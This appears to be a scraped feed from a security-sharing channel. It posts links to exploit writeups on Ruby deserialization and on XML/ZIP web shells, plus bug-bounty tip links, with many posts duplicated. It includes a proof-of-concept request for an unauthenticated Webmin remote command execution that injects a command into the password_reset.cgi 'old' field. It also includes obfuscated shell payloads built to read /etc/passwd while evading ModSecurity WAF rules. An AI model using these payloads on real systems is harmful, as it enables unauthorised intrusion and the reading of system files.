Something special for the weekend...: A nice writeup on Universal #RCE #exploit by exploiting #Ruby 2.x #serialization
https://www.elttam.com.au/blog/ruby-deserialization/
https://www.elttam.com.au/blog/ruby-deserialization/
Forwarded from امنیت اطلاعات
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#RCE
https://t.co/F9of890IQh
https://t.co/dTuAIHIk7t
https://t.co/LNe2A8xwOM
https://t.co/8BCSrzAo72
https://t.co/qPB62I7qNo
https://t.co/XdwFJjUCVX
https://t.co/j9Db6GVmp7
https://t.co/NdhxcUnIs6
https://t.co/Z364swmX8G
#bugbounty,#bugbountytips
https://t.co/F9of890IQh
https://t.co/dTuAIHIk7t
https://t.co/LNe2A8xwOM
https://t.co/8BCSrzAo72
https://t.co/qPB62I7qNo
https://t.co/XdwFJjUCVX
https://t.co/j9Db6GVmp7
https://t.co/NdhxcUnIs6
https://t.co/Z364swmX8G
#bugbounty,#bugbountytips
spaceraccoon.dev
A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell — spaceraccoon.dev
XML and ZIP - A Tale as Old As Time While researching a bug bounty target, I came across a web application that processed a custom file ...